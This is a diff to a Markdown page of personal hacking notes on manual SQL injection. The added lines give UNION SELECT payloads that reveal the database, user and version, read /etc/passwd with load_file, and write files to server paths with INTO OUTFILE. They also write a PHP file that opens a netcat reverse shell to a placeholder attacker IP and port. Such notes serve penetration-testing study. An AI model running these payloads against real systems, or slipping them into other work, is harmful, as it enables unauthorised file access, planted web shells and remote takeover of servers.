amandaguglieri/hackinglife/docs/sqli-manual-attack.md

 And here an example of how to retrieve them:

 ```
-# if injectable columns are number 2, 3 and 4
+# if injectable columns are number 2, 3 and 4 you can display some info from the system
 union select 1, database(),user(),version(),5

+# Extra bonus
+# You can also load a file from the system with
+union select 1, load_file(/etc/passwd),3,4,5

+# and you can try to write to a file in the server
+union select 1,'example example',3,4,5 into outfile '/var/www/path/to/file.txt'
+union select 1,'example example',3,4,5 into outfile '/tmp/file.txt'

+# and we can combine that with a reverse shell like
+union select 1,'<?passthru("nc -e /bin/sh <attacker IP> <attacker port>") ?>', 3,4,5 into outfile '/tmp/reverse.php'

 ```